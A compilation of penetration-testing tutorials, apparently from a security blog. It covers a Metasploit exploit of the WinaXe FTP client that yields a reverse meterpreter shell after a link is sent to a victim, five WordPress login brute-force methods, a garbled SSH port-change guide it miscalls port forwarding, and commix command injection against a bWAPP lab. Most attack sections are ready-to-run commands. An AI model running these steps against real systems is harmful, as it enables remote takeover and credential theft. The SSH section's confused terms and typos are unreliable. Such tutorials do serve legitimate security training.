Exploit Windows 10 pc using WinaXe 7.7 FTP Client Remote Buffer Overflow

This module exploits a buffer overflow in the WinaXe 7.7 FTP client. This issue is triggered when a client connects to the server and is expecting the Server Ready response.

Exploit Targets

WinaXe 7.7 FTP client

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open Kali terminal type msfconsole

Now type use exploit/windows/ftp/winaxe_server_ready

msf exploit (winaxe_server_ready)>set lhost 192.168.0.106

msf exploit (winaxe_server_ready)>set srvhost 192.168.0.106

msf exploit (winaxe_server_ready)>set payload windows/meterpreter/reverse_tcp

msf exploit (winaxe_server_ready)>exploit          

Now send the link to the victim when victim, enter in connection details and wait for the FTP connection WinaXe ftp. You will get victim meterpreter session.

5 ways to Brute Force Attack on Wordpress Website

Brute force attack using Burp Suite

To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings.

Now, select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

Now open the Wordpress in your pc and it will ask you the username and password. Here, before giving username and password start burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off button.

When you turn on the interception then type any password of your predictions so that the burp suite can capture it. Look at image please notice the last line in fetched data it is show that I tried to login by type admin:admin as username and password respectively.

Send the captured material to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Now open the Intruder tab then select Positions tab without disturbing data click on clear button on right side of frame

Now select the following as I have selected in the image and click on add button on the right side of frame. This will configure the position where payloads will be inserted into the base request.

Select the type of attack to determine the way in which payload are assigned to payload positions. I will choose cluster bomb as the number of payload set is depend upon attack type and we are having 2 payload positions. Click on start attack.

Click on payload set which will show two numeric numbers 1 and 2 select number 1 for first payload position. Further click on load button in payload option and configure your simple list string that will use as payload or you can add path of any dictionary username only. Similarly select number 2 for another payload position. Add path of any dictionary having password only. Click on start attack.

Now brute attack will match the combination of both payload and try to login in with username and password.

When attack will finished you would get the sure credential by checking status and length which would be different from rest of combination.

From result user:bitnami is username and password respectively.

Brute force attack using wpscan

WPScan is a black box vulnerability scanner for WordPress which is already installed by default in Kali Linux. For Wordpress brute force you need a good dictionary or can make your own dictionary for attack.

ruby ./wpscan.rb –url 192.168.1.14 – wordlist /root/Desktop/pass.txt –username user

In this brute force attack I have just added wordlist for password. From result user:bitnami is login and password respectively.

Brute force attack using metasploit

This module will test WordPress logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database this module, it will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4

msf auxiliary(wordpress_login_enum) > set rport 80

msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt

msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt

msf auxiliary(wordpress_login_enum) > exploit

WordPress brute force successful for login user:bitnami  as username and password.

Brute force attack using OWASP ZAP

Zap is an easy to use integrated penetration testing tool for finding the vulnerabilities in web application. Now we will use this tool for brute force attack and the whole process is same as burp suite.

Start OWASP ZAP and turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings. Select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

Now once again open the Wordpress in your pc and it will predict the username and password.

It will capture the data as you can see I have login with user as username and password as password. You can see it in the Request section of the tool select the character which you have entered in the page before. Therefore I will select only password from fetched data then use right click for fuzz option.

When you click on fuzz a new window ‘fuzzer’ will get open, now you have to click on add button on left of frame it will open a new window add payload. Click on select and choose your dictionary for attack.

Again click on add button and then click on start fuzzer.

After starting fuzzing again a new screen will open click on option button click to depth first radio button for payload replacement strategy. Select the check box of follow redirects and click to start fuzzing.

When attack will finished you would get the sure credential by checking state and size response header which would be different from rest of combination.

From result bitnami is password for login user.

Brute force attack using Nmap

This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.

Open Kali terminal type following Nmap command

 nmap –sV – script http-wordpress-brute – script-args ‘userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt, http-wordpress-brute.hostname=domain.com,http-wordpress-brute.thread=3,brute.firstonly=true’ 192.168.1.17

How to Secure SSH Port using Port Forwarding (Beginner Guide)

In this article I am going to perform how to use port forwarding in a system which is a process that redirects a communication request from a specific port to another port or host. It is basically allows an outside computer to connect to a computer in a private local area network. Some commonly done port forwarding includes forwarding port 22 for SSH access, and forwarding port 80 for web servers. The major advantage is that it provides security to your private network and secure communication.

Requirement: Kali Linux

Let start!!

Open terminal and type following command to install openssh-server in your system.

apt-get install open-server

After installing the application we need to start this service in our computer which will start SSH service for communication further we have to check the status of service is running or stop.

service ssh start

service ssh status

Yes, SSH service is active and you can see the proper running status with the time and date. 

As we know port 22 is use for ssh and here server listening on port 22.

If I want to check whether the port 22 open or close I will use nmap tool to scane the host using basic command.

SCAN YOUR HOST

root@kali:~# nmap 192.168.0.103

From the result of nmap scan I found port 22 open under service ssh .

Port 22 is badly affected by DDOS attack; if attacker found port 22 open for ssh they will start attacking on server. For security purpose administrator uses port forwarding techniques.

Let me show how to forward a specific port to another port.

PORT FORWARD TECHNIQUE

In kali linux open file sshd_config from computer>etc>ssh>ssd_config

Please look at line no.3 here protocol is listening for port 22 and now just replace 22 from1923 and save the file without changing path.

service ssh restart

So now protocol is listening on port 1923 in place of 22. Let me confirm this with nmap scan.

USE NMAP

nmap -p 1-65535 192.168.0.103

Now if anybody else will scan your ip he/she will have no idea that ssh service is running on port 1923 because from result it is showing 1923 is open under spice service.

Nmap basic scan is failed because we are not getting the proper result from this basic scan. If you are having a good knowledge of Nmap scan then use advances command.

nmap -p - -A  192.168.0.103

Aggressive scan is successful , this scan penetrate under port, protocol and service as you can see port 1923 is open for ssh service.

USE TELNET

Same result can be found under telnet when you connect the host with port no. 1923.

telnet 192.168.0.103 1923

so if you found any port open just try to connect with telnet and you will get result which service is running on that perticular port. Look at the image result is very clear that port 1923 is listening for ssh.

USE NETCAT

Same purpose using netcat you will able to found current service for which 1923 is open.

 nc 192.168.0.103 1923

This entire task can be performed under windows system.

check whether the port 22 open or close again use Nmap scan

nmap 192.168.0.103

 From the result of Nmap scan I found port 22 open under service ssh.

open file sshd_config from my computer>local Disk(C:)>program files>OpenSSH>etc>ssd_config

Here protocol is listening for port 22 and now just replace 22 from3221 and save the file.

So now protocol is listening on port 3221 in place of 22.

Now open command prompt and type following command to restart the ssh service in your system.

C:\WINDOWS\SYSTEM32>net stop opensshd

C:\Users\RAJ>net start opensshd

Let me confirm this with Nmap scan.

nmap -A 192.168.0.103

It is clear from aggressive scan SSH is running on port 3221 instead of port 22.

In this way we can breach port forwarding also. 

bWAPP Command Injection Exploitation using Commix (Bypass All Security)

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

Very first you need to setup bWAPP lab in your XAMPP or WAMP server, for this you can visit to my previous article web Pentest lab setup using bwapp here.

Now I m going to perform os command injection attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

My task is to bypass all three security level in bWAPP through os command injection.

Let start!

Set security level: low

Look at below image I have set the security level low, from option choose you bug select os command injection now and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

To capture the cookie of bWAPP click on proxy option then click to inception is on button, come back to bWAPP and now click to DNS.

As you can see I have capture the cookie in burp suite.

Open the terminal in kali Linux and type the commix command.

From fetched data under burp suite copy referrer, cookie and target use this in the following command

 commix --url="http://192.168.1.103:81/bWAPP/commandi.php" --cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0" --data=target="192.168.1.103&form=submit"

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful commix provided a commix os shell

Commix (os_shell) > syseteminfo

Set security level: medium

Look at below image now I have set the security level medium, from option choose you bug select os command injection now and click on hack.

Repeat the process again as above, Type the IP in the DNS lookup field and just after that start the burp suite.

Click to inception is on, come back to bWAPP and now click to DNS. As you can see I have capture the cookie for medium level in burp suite.

From fetched data under burp suite copy referrer, cookie and target use this in the following command.

commix--url="http://192.168.1.103:81/bWAPP/commandi.php"--cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=1"--data=target="192.168.1.103&form=submit"

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful in medium security and again commix provided a commix os shell.

Commix (os_shell) > ipconfig

Set security level: high

After achieving os shell of low and medium my next mode is high security, now I m trying to bypass this level by repeating same process once again.

Set security high, choose your bug os command injection and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. From fetched data under burp suite copy referrer, cookie and target use this in the following command.

commix--url="http://192.168.1.103:81/bWAPP/commandi.php"--cookie="PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=2"--data=target="192.168.1.103&form=submit"

Type ‘y’ to resume the classic injection point and to pseudo terminal shell. We have successfully bypass high level also with the same process.  

Commix (os_shell) > systeminfo